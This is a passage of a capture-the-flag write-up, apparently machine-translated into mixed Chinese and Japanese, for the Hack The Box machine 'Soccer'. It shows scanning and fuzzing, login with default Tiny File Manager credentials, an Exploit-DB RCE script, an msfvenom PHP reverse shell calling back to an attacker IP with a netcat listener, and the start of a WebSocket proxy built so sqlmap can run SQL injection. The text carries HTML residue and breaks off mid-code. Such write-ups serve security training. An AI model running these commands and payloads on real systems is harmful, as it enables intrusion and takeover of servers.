\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~]\r\n\u2514\u2500# rustscan -a<\/span> 10.10.11.194 --top<\/span> --ulimit<\/span> 10000 \r\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\r\n| {}<\/span> }<\/span>| {<\/span> }<\/span> |{<\/span> {<\/span>__ {<\/span>_ _}{<\/span> {<\/span>__ \/ ___}<\/span> \/ {}<\/span> \\ <\/span>| `<\/span>| |\r\n| .-. \\|<\/span> {<\/span>_}<\/span> |.-._}<\/span> }<\/span> | | .-._}<\/span> }<\/span>\\ <\/span> }<\/span>\/ \/\\ <\/span> \\|<\/span> |\\ <\/span> |\r\n`<\/span>-' `-'<\/span>`<\/span>-----<\/span>'`----'<\/span> `<\/span>-' `----'<\/span> `<\/span>---<\/span>' `-'<\/span> `<\/span>-'`-'<\/span> `<\/span>-'\r\nThe Modern Day Port Scanner.\r\n________________________________________\r\n: https:\/\/discord.gg\/GFrQsGy :\r\n: https:\/\/github.com\/RustScan\/RustScan :\r\n --------------------------------------\r\n?HACK THE PLANET?\r\n\r\n[~] The config file is expected to be at \"\/root\/.rustscan.toml\"\r\n[~] Automatically increasing ulimit value to 10000.\r\nOpen 10.10.11.194:22\r\nOpen 10.10.11.194:80\r\nOpen 10.10.11.194:9091\r\n[~] Starting Script(s)\r\n[>] Script to be run Some(\"nmap -vvv -p {{port}} {{ip}}\")\r\n\r\n[~] Starting Nmap 7.91 ( https:\/\/nmap.org ) at 2022-12-23 17:26 JST\r\nInitiating Ping Scan at 17:26\r\nScanning 10.10.11.194 [4 ports]\r\nCompleted Ping Scan at 17:26, 0.35s elapsed (1 total hosts)\r\nInitiating Parallel DNS resolution of 1 host. at 17:26\r\nCompleted Parallel DNS resolution of 1 host. at 17:26, 0.01s elapsed\r\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\r\nInitiating SYN Stealth Scan at 17:26\r\nScanning 10.10.11.194 [3 ports]\r\nDiscovered open port 80\/tcp on 10.10.11.194\r\nDiscovered open port 22\/tcp on 10.10.11.194\r\nDiscovered open port 9091\/tcp on 10.10.11.194\r\nCompleted SYN Stealth Scan at 17:26, 0.30s elapsed (3 total ports)\r\nNmap scan report for 10.10.11.194\r\nHost is up, received reset ttl 63 (0.27s latency).\r\nScanned at 2022-12-23 17:26:11 JST for 0s\r\n\r\nPORT STATE SERVICE REASON\r\n22\/tcp open ssh syn-ack ttl 63\r\n80\/tcp open http syn-ack ttl 63\r\n9091\/tcp open xmltec-xmlmail syn-ack ttl 63\r\n\r\nRead data files from: \/usr\/bin\/..\/share\/nmap\r\nNmap done: 1 IP address (1 host up) scanned in 1.02 seconds\r\n Raw packets sent: 7 (284B) | Rcvd: 4 (172B)\r\n<\/span><\/code><\/pre>\n\u4f3c\u4e4e\u5df2\u516c\u5f00\u7aef\u53e322\u300180\u548c9091\u3002\u5b9e\u9645\u4e0a\uff0c\u5f53\u6211\u5c1d\u8bd5\u8bbf\u95ee80\u7aef\u53e3\u65f6\uff0c\u5f97\u5230\u4e86”\u65e0\u6cd5\u8bbf\u95eesoccer.htb”\u7684\u63d0\u793a\uff0c\u56e0\u6b64\u9700\u8981\u8bbe\u7f6eDNS\u914d\u7f6e\u3002<\/p>\n
\u6536\u85cf<\/h1>\n\u57df\u540d\u73af\u5883\u8bbe\u7f6e<\/h2>\n
\u4eca\u56deBOX\u74b0\u5883\u306bDNS\u306f\u306a\u3044\u306e\u3067\u3001\u81ea\u8eab\u306ekalilinux\u3067\u540d\u524d\u89e3\u6c7a\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u3068\u304f\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# vim \/etc\/resolv.conf \r\n<\/code><\/pre>\n\u8bf7\u63d0\u4f9b\u4ee5\u4e0b\u5185\u5bb9\u3002<\/p>\n
nameserver 127.0.0.1\r\n<\/code><\/pre>\n\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u8981\u4fee\u6539\/etc\/host\u6587\u4ef6\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# vim \/etc\/hosts \r\n<\/code><\/pre>\n\u8bf7\u6295\u5165\u4ee5\u4e0b\u5185\u5bb9\u3002<\/p>\n
10.10.11.194 soccer.htb\r\n<\/code><\/pre>\n\u758e\u901a\u78ba\u8a8d\u3092\u884c\u3046\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~]\r\n\u2514\u2500# ping soccer.htb \r\n<\/code><\/pre>\n\u7f51\u7ad9\u641c\u7d22<\/h2>\n
\u7531\u4e8eHttp\u670d\u52a1\u53ef\u7528\uff0c\u6240\u4ee5\u6211\u4eec\u4f1a\u4ece\u4e00\u79cd\u5143\u9605\u8bfb\u7684\u89d2\u5ea6\u5f00\u59cb\u5bf9\u7f51\u7ad9\u8fdb\u884c\u641c\u7d22\uff0c\u56e0\u4e3a\u6211\u731c\u60f3\u7f51\u9875\u4e0a\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e\u3002<\/p>\n
Subdomain\u63a2\u7d22<\/h3>\n
\u8bf7\u4ece\u4ee5\u4e0b\u7f51\u7ad9\u4e0b\u8f7d\u5b50\u57df\u540d\u5217\u8868\u3002<\/p>\n
<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# wget https:\/\/raw.githubusercontent.com\/danielmiessler\/SecLists\/master\/Discovery\/DNS\/bitquark-subdomains-top100000.txt\r\n<\/code><\/pre>\nffuf\u3067\u63a2\u7d22\u3002\u7279\u6bb5\u305d\u308c\u3063\u307d\u3044\u306e\u306f\u306a\u3055\u305d\u3046\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# ffuf -w<\/span> .\/bitquark-subdomains-top100000.txt:FUZZ -u<\/span> http:\/\/soccer.htb\/ -H<\/span> \"HOST: FUZZ.soccer.htb\"<\/span> -fs<\/span> 178 -t<\/span> 60\r\n\r\n \/'___\\ \/'<\/span>___\\ <\/span> \/'___\\ \r\n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \r\n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \r\n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \r\n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \r\n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \r\n\r\n v1.5.0 Kali Exclusive <3\r\n________________________________________________\r\n\r\n :: Method : GET\r\n :: URL : http:\/\/soccer.htb\/\r\n :: Wordlist : FUZZ: .\/bitquark-subdomains-top100000.txt\r\n :: Header : Host: FUZZ.soccer.htb\r\n :: Follow redirects : false\r\n :: Calibration : false\r\n :: Timeout : 10\r\n :: Threads : 60\r\n :: Matcher : Response status: 200,204,301,302,307,401,403,405,500\r\n :: Filter : Response size: 178\r\n________________________________________________\r\n\r\n:: Progress: [100000\/100000] :: Job [1\/1] :: 219 req\/sec :: Duration: [0:09:28] :: Errors: 0 ::\r\n<\/span><\/code><\/pre>\n\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u63a2\u7d22<\/h3>\n
\u4f7f\u7528dirsearch\u8fdb\u884c\u63a2\u7d22\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~]\r\n\u2514\u2500# dirsearch -u<\/span> http:\/\/soccer.htb\/ 1 \u2a2f\r\n\r\n _|. _ _ _ _ _ _|_ v0.4.2\r\n (<\/span>_||| _)<\/span> (<\/span>\/_(<\/span>_|| (<\/span>_| )<\/span>\r\n\r\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927\r\n\r\nOutput File: \/root\/.dirsearch\/reports\/soccer.htb\/-_22-12-23_17-30-18.txt\r\n\r\nError Log: \/root\/.dirsearch\/logs\/errors-22-12-23_17-30-18.log\r\n\r\nTarget: http:\/\/soccer.htb\/\r\n\r\n[<\/span>17:30:19] Starting: \r\n[<\/span>17:30:27] 403 - 564B - \/.ht_wsr.txt \r\n[<\/span>17:30:27] 403 - 564B - \/.htaccess.bak1\r\n[<\/span>17:30:27] 403 - 564B - \/.htaccess.orig\r\n[<\/span>17:30:27] 403 - 564B - \/.htaccess.sample\r\n[<\/span>17:30:27] 403 - 564B - \/.htaccess.save\r\n[<\/span>17:30:27] 403 - 564B - \/.htaccess_extra\r\n[<\/span>17:30:27] 403 - 564B - \/.htaccess_orig\r\n[<\/span>17:30:27] 403 - 564B - \/.htaccess_sc\r\n[<\/span>17:30:27] 403 - 564B - \/.htaccessOLD2\r\n[<\/span>17:30:27] 403 - 564B - \/.htaccessBAK\r\n[<\/span>17:30:27] 403 - 564B - \/.htaccessOLD\r\n[<\/span>17:30:27] 403 - 564B - \/.htm \r\n[<\/span>17:30:27] 403 - 564B - \/.html\r\n[<\/span>17:30:27] 403 - 564B - \/.htpasswd_test\r\n[<\/span>17:30:27] 403 - 564B - \/.httr-oauth\r\n[<\/span>17:30:27] 403 - 564B - \/.htpasswds \r\n[<\/span>17:30:50] 403 - 564B - \/admin\/.htaccess \r\n[<\/span>17:30:59] 403 - 564B - \/administrator\/.htaccess \r\n[<\/span>17:31:02] 403 - 564B - \/app\/.htaccess \r\n[<\/span>17:31:25] 200 - 7KB - \/index.html \r\n \r\nTask Completed\r\n<\/code><\/pre>\n\u30a2\u30af\u30bb\u30b9\u62d2\u5426\u3055\u308c\u3066\u3044\u308b\u30ea\u30bd\u30fc\u30b9\u304c\u5927\u534a\u3067\u3042\u308b\u3002\u5b9f\u969b\u306b\u30a2\u30af\u30bb\u30b9\u3057\u3066\u307f\u3066\u3069\u3046\u3044\u3063\u305fWeb\u30b5\u30a4\u30c8\u304b\u63a2\u3063\u3066\u307f\u305f\u304c\u7279\u6bb5Submit\u3067\u304d\u305d\u3046\u306a\u3068\u3053\u308d\u3082\u306a\u3044\u306e\u3067\u66f4\u306b\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u63a2\u7d22\u3092FFuF\u3067\u5b9f\u65bd\u3057\u3066\u3044\u304f\u3002
\n\u30b5\u30d6\u30c9\u30e1\u30a4\u30f3\u30ea\u30b9\u30c8\u3092\u5f15\u3063\u5f35\u3063\u3066\u304d\u305f\u30b5\u30a4\u30c8\u304b\u3089Web\u30b3\u30f3\u30c6\u30f3\u30c4\u30ea\u30b9\u30c8\u3092\u6301\u3063\u3066\u304f\u308b\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# wget https:\/\/raw.githubusercontent.com\/danielmiessler\/SecLists\/master\/Discovery\/Web-Content\/directory-list-2.3-small.txt\r\n<\/code><\/pre>\n\u8fdb\u884c\u6a21\u7cca\u6d4b\u8bd5\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# ffuf -w<\/span> .\/directory-list-2.3-small.txt:FUZZ -u<\/span> http:\/\/soccer.htb\/FUZZ -t<\/span> 100\r\n\r\n \/'___\\ \/'<\/span>___\\ <\/span> \/'___\\ \r\n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \r\n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \r\n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \r\n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \r\n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \r\n\r\n v1.5.0 Kali Exclusive <3\r\n________________________________________________\r\n\r\n :: Method : GET\r\n :: URL : http:\/\/soccer.htb\/FUZZ\r\n :: Wordlist : FUZZ: .\/directory-list-2.3-small.txt\r\n :: Follow redirects : false\r\n :: Calibration : false\r\n :: Timeout : 10\r\n :: Threads : 100\r\n :: Matcher : Response status: 200,204,301,302,307,401,403,405,500\r\n________________________________________________\r\n\r\n# [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 270ms]\r\n# directory-list-2.3-small.txt [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 269ms]\r\n# This work is licensed under the Creative Commons [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 272ms]\r\n# [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 280ms]\r\n# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 281ms]\r\n# license, visit http:\/\/creativecommons.org\/licenses\/by-sa\/3.0\/ [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 281ms]\r\n# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 281ms]\r\n# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 282ms]\r\n# on at least 3 different hosts [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 282ms]\r\n [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 283ms]\r\n# [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 281ms]\r\n# Copyright 2007 James Fisher [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 285ms]\r\n# [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 283ms]\r\n# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 283ms]\r\ntiny [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 263ms]\r\n [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 272ms]\r\n:: Progress: [87664\/87664] :: Job [1\/1] :: 365 req\/sec :: Duration: [0:04:17] :: Errors: 0 ::\r\n<\/span><\/code><\/pre>\n\u300ctiny\u300d\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u968e\u5c64\u304c\u898b\u3064\u304b\u3063\u305f\u306e\u3067\u66f4\u306b\u63a2\u3063\u3066\u3044\u304f\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# ffuf -w<\/span> .\/directory-list-2.3-small.txt:FUZZ -u<\/span> http:\/\/soccer.htb\/tiny\/FUZZ -t<\/span> 50\r\n\r\n \/'___\\ \/'<\/span>___\\ <\/span> \/'___\\ \r\n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \r\n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \r\n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \r\n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \r\n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \r\n\r\n v1.5.0 Kali Exclusive <3\r\n________________________________________________\r\n\r\n :: Method : GET\r\n :: URL : http:\/\/soccer.htb\/tiny\/FUZZ\r\n :: Wordlist : FUZZ: .\/directory-list-2.3-small.txt\r\n :: Follow redirects : false\r\n :: Calibration : false\r\n :: Timeout : 10\r\n :: Threads : 50\r\n :: Matcher : Response status: 200,204,301,302,307,401,403,405,500\r\n________________________________________________\r\n\r\n# on at least 3 different hosts [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 282ms]\r\n# [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 282ms]\r\n [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 283ms]\r\n# This work is licensed under the Creative Commons [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 327ms]\r\n# directory-list-2.3-small.txt [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 331ms]\r\n# [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 330ms]\r\n# Copyright 2007 James Fisher [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 333ms]\r\n# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 333ms]\r\n# [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 333ms]\r\n# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 334ms]\r\n# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 334ms]\r\n# license, visit http:\/\/creativecommons.org\/licenses\/by-sa\/3.0\/ [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 335ms]\r\n# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 336ms]\r\n# [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 336ms]\r\nuploads [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 281ms]\r\n [Status: 200, Size: 11521, Words: 3512, Lines: 97, Duration: 274ms]\r\n:: Progress: [87664\/87664] :: Job [1\/1] :: 178 req\/sec :: Duration: [0:10:06] :: Errors: 51 ::\r\n<\/span><\/code><\/pre>\n\u300c\/tiny\/uploads\u300d\u306e\u968e\u5c64\u304c\u898b\u3064\u304b\u3063\u305f\u3002\u3053\u3053\u304b\u3089\u66f4\u306b\u968e\u5c64\u3092\u63a2\u3063\u3066\u307f\u305f\u304c\u826f\u3055\u305d\u3046\u306a\u7269\u306f\u898b\u3064\u304b\u3089\u306a\u304b\u3063\u305f\u3002
\n\u305d\u3053\u3067\u5b9f\u969b\u306b\u300ctiny\u300d\u306e\u968e\u5c64\u3078\u30a2\u30af\u30bb\u30b9\u3057\u3066\u307f\u308b\u3068\u4ee5\u4e0b\u306e\u30ed\u30b0\u30a4\u30f3\u753b\u9762\u304c\u51fa\u3066\u304d\u305f\u3002<\/p>\n
![\"1.png\"](\"https:\/\/cdn.silicloud.com\/blog-img\/blog\/img\/657d1f6537434c4406c1a6c3\/39-0.png\" "\\"\\"")
<\/div>\nTiny File Manager \u3092\u4f7f\u3063\u3066\u3044\u308b\u3088\u3046\u3060\u3002<\/p>\n
\u521d\u59cb\u8bbf\u95ee – \u7b2c1\u6b65<\/h1>\n
\u6211\u51b3\u5b9a\u8c03\u67e5\u8fd9\u4e2a\u4eba\u7684\u8eab\u4efd\u8ba4\u8bc1\u4fe1\u606f\u3002
\n\u56e0\u4e3a\u4e0b\u9762\u6709\u9ed8\u8ba4\u7684\u8d26\u6237\u5bc6\u7801\uff0c\u6240\u4ee5\u6211\u5c1d\u8bd5\u4e86\u4e00\u4e0b\uff0c\u7adf\u7136\u6210\u529f\u4e86\uff01<\/p>\n
\u9ed8\u8ba4\u7528\u6237\u540d\/\u5bc6\u7801\uff1aadmin\/admin@123\u548cuser\/12345\u3002<\/p><\/blockquote>\n
<\/p>\n
![\"1a.png\"](\"https:\/\/cdn.silicloud.com\/blog-img\/blog\/img\/657d1f6537434c4406c1a6c3\/45-0.png\" "\\"\\"")
<\/div>\n <\/p>\n
\u7528Kali\u5c06\u8fd9\u6bb5Exploit\u4ee3\u7801\u5f15\u5165\u8fdb\u53bb\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~]\r\n\u2514\u2500# searchsploit -p<\/span> 50828\r\n Exploit: Tiny File Manager 2.4.6 - Remote Code Execution (<\/span>RCE)<\/span>\r\n URL: https:\/\/www.exploit-db.com\/exploits\/50828\r\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/50828.sh\r\n Codes: CVE-2021-45010, CVE-2021-40964\r\n Verified: False\r\nFile Type: UTF-8 Unicode text\r\n<\/code><\/pre>\n![\"image.png\"](\"https:\/\/cdn.silicloud.com\/blog-img\/blog\/img\/657d1f6537434c4406c1a6c3\/49-0.png\" "\\"\\"")
<\/div>\n\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# .\/50828.sh http:\/\/soccer.htb\/tiny\/ admin admin@123 1 \u2a2f\r\n\/usr\/bin\/curl\r\n[<\/span>\u2714] Curl found! \r\n\/usr\/bin\/jq\r\n[<\/span>\u2714] jq found! \r\n\r\n[<\/span>+] Login Success! Cookie: filemanager<\/span>=<\/span>lpj4uvl4vc8u36nrghgi2fnc11 \r\n\r\n[<\/span>*<\/span>]<\/span> Try to Leak Web root directory path \r\n\r\n[<\/span>+] Found WEBROOT directory for <\/span>tinyfilemanager using full path disclosure bug : \/var\/www\/html\/tiny\/ \r\n\r\n[<\/span>-] File Upload Unsuccessful! Exiting! \r\n<\/code><\/pre>\nExploit\u306f\u901a\u308a\u305d\u3046\u3060\u304c\u3001Payload\u3092\u6253\u3061\u8fbc\u3080\u305f\u3081\u306e\u66f8\u304d\u8fbc\u307f\u6a29\u9650\u304c\u306a\u3044\u3088\u3046\u3067\u3042\u308b\u3002<\/p>\n
Persistence – 1<\/h1>\n
\u7531\u4e8e\u300c50828.sh\u300d\u7684Exploit\u65e0\u6cd5\u4f7f\u7528\uff0c\u6211\u6253\u7b97\u76f4\u63a5\u4eceWeb\u4e0a\u8f93\u5165ReverseShell\u3002\u6211\u8ba1\u5212\u5229\u7528\u4ee5\u4e0b\u975e\u5e38\u65b9\u4fbf\u7684\u7f51\u7ad9\u3002<\/p>\n
<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# msfvenom -p<\/span> php\/reverse_php LHOST<\/span>=<\/span>10.10.14.72 LPORT<\/span>=<\/span>4444 -o<\/span> shell.php 1 \u2a2f\r\n[<\/span>-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload\r\n[<\/span>-] No arch <\/span>selected, selecting arch<\/span>: php from the payload\r\nNo encoder specified, outputting raw payload\r\nPayload size: 3018 bytes\r\nSaved as: shell.php\r\n<\/code><\/pre>\n\u53d7\u3051\u5074\u3082\u7528\u610f\u3057\u3066\u304a\u304f\u3002<\/p>\n
\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# nc -lvnp<\/span> 4444\r\nlistening on [<\/span>any] 4444 ...\r\n<\/code><\/pre>\n![\"3.png\"](\"https:\/\/cdn.silicloud.com\/blog-img\/blog\/img\/657d1f6537434c4406c1a6c3\/58-1.png\" "\\"\\"")
<\/div>\n\u304a\u304a\u304a\uff01\uff01\uff01\u30b7\u30a7\u30eb\u30b2\u30c3\u30c8\u3060\u305c\uff01\uff01\uff01
\n…\u3060\u304c\u300cuser.txt\u300d\u3092\u898b\u308b\u3053\u3068\u306f\u3067\u304d\u306a\u3044\u3002home\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u968e\u5c64\u3092\u898b\u305f\u611f\u3058\u300cplayer\u300d\u306e\u30e6\u30fc\u30b6\u306e\u30b7\u30a7\u30eb\u6a29\u9650\u3092\u53d6\u5f97\u3057\u306a\u3044\u3068\u3044\u3051\u306a\u3044\u3088\u3046\u3067\u3042\u308b\u3002<\/p>\n
\u53d1\u73b0-2<\/h1>\n![\"4.png\"](\"https:\/\/cdn.silicloud.com\/blog-img\/blog\/img\/657d1f6537434c4406c1a6c3\/61-0.png\" "\\"\\"")
<\/div>\n\u250c\u2500\u2500(<\/span>root?kali)<\/span>-[~\/work]\r\n\u2514\u2500# vim \/etc\/hosts \r\n<\/code><\/pre>\n\u4ee5\u4e0b\u3092\u6295\u5165\u3002<\/p>\n
10.10.11.194 soc-player.soccer.htb\r\n<\/code><\/pre>\n![\"6a.png\"](\"https:\/\/cdn.silicloud.com\/blog-img\/blog\/img\/657d1f6537434c4406c1a6c3\/65-4.png\" "\\"\\"")
<\/div>\nWebsocket\u304b\u3041…\u308f\u3063\u304b\u3093\u306d\u3047…<\/p>\n
\u521d\u59cb\u8bbf\u95ee-2<\/h1>\n
\u3053\u306e\u30b7\u30b9\u30c6\u30e0\u306e\u52d5\u4f5c\u3092\u306a\u3093\u3068\u306a\u304f\u3067\u898b\u3066\u308b\u3068\u3001\u3042\u308b\u7a0b\u5ea6\u3069\u3046\u3044\u3063\u305f\u52d5\u4f5c\u3092\u3057\u3066\u3044\u308b\u304b\u308f\u304b\u3063\u305f\u308a\u3059\u308b…
\n\u3053\u308c\u306fWeb\u958b\u767a\u8005\u5411\u3051\u306e\u611f\u899a\u306b\u306a\u308b\u306e\u3060\u304c\u3001\u3053\u306e\u901a\u4fe1\u306fTicketID\u3092\u9001\u4fe1\u3057\u3066\u305d\u306eID\u3092\u691c\u7d22\u3057\u3001\u3042\u308c\u3070Exits\u3068\u56de\u7b54\u3059\u308b\u901a\u4fe1\u3092\u8fd4\u3057\u3066\u3044\u308b\u3068\u5224\u65ad\u3055\u308c\u308b\u3002
\n\u30d0\u30c3\u30af\u30a8\u30f3\u30c9\u3067SQL\u3092\u305f\u305f\u3044\u3066\u3044\u308b\u30bd\u30fc\u30b9\u304c\u3042\u3063\u305f\u308a\u3057\u305d\u3046\u3002
\n\u66f4\u306b\u306fWebsocket\u3092\u7528\u3044\u305f\u6700\u8fd1\u306eCTF\u3067\u306fSQLi\u3092\u8a66\u3059\u3053\u3068\u3067\u7a81\u7834\u3067\u304d\u308b\u3053\u3068\u3082\u591a\u304f\u306a\u3063\u3066\u304d\u3066\u3044\u308b\u3002<\/p>\n
\u6240\u4ee5\uff0c\u603b\u4e4b\uff0c\u6211\u6253\u7b97\u5148\u8bd5\u8bd5SQLi\u3002
\n\u203b\u5b9e\u9645\u4e0a\u8fd9\u4e2a\u90e8\u5206\u53ea\u662f\u51ed\u611f\u89c9\u505a\u7684\uff0c\u5bf9\u4e0d\u8d77\uff0c\u5728\u6211\u63d0\u524d\u8bf4\u7684\u4e8b\uff0c\u603b\u4e4b\uff0c\u6211\u597d\u50cf\u6210\u529f\u4e86\uff08\u7b11\uff09\u3002<\/p>\n
\u5728Websocket\u4e0a\u4f7f\u7528sqlmap<\/h2>\n
\u6211\u8ba4\u4e3a\u5728\u5c1d\u8bd5SQLi\u65f6\uff0c\u7ecf\u5e38\u4f7f\u7528\u7684\u5de5\u5177\u662fsqlmap\u3002\u7136\u800c\uff0c\u8fd9\u4e2a\u5de5\u5177\u4f3c\u4e4e\u6ca1\u6709\u8003\u8651\u5230WebSocket\u901a\u4fe1\u3002
\n\u6240\u4ee5\uff0c\u6211\u81ea\u5df1\u5236\u4f5c\u4e86\u4e00\u4e2a\u5c06sqlmap\u7684HTTP\u901a\u4fe1\u8f6c\u6362\u4e3aWebSocket\u7684\u5de5\u5177\u3002
\n\u53c2\u8003\u4e86\u4ee5\u4e0b\u7f51\u7ad9\u8fdb\u884c\u521b\u5efa\u3002<\/p>\n
<\/p>\n
\u30b3\u30fc\u30c9\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306b\u306a\u3063\u305f\u3002<\/p>\n
from<\/span> http.server<\/span> import<\/span> SimpleHTTPRequestHandler<\/span>\r\nfrom<\/span> socketserver<\/span> import<\/span> TCPServer<\/span>\r\nfrom<\/span> urllib.parse<\/span> import<\/span> unquote<\/span>,<\/span> urlparse<\/span>\r\nfrom<\/span> websocket<\/span> import<\/span> create_connection<\/span>\r\n\r\n# \u4eca\u56de\u306eWebsocket\u306e\u901a\u4fe1\u5148\r\n<\/span>ws_server<\/span> =<\/span> \"<\/span>ws:\/\/soc-player.soccer.htb:9091<\/span>\"<\/span>\r\n\r\ndef<\/span> send_ws<\/span>(<\/span>payload<\/span>):<\/span>\r\n\tws<\/span> =<\/span> create_connection<\/span>(<\/span>ws_server<\/span>)<\/span>\r\n\t# If the server returns a response on connect, use below line\t\r\n<\/span>\t#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here\r\n<\/span>\t\r\n\t# For our case, format the payload in JSON\r\n<\/span>\tmessage<\/span> =<\/span> unquote<\/span>(<\/span>payload<\/span>).<\/span>replace<\/span>(<\/span>'\"'<\/span>,<\/span>'<\/span>\\'<\/span>'<\/span>)<\/span> # replacing \" with ' to avoid breaking JSON structure\r\n<\/span>\tdata<\/span> =<\/span> '<\/span>{<\/span>\"<\/span>id<\/span>\"<\/span>:<\/span>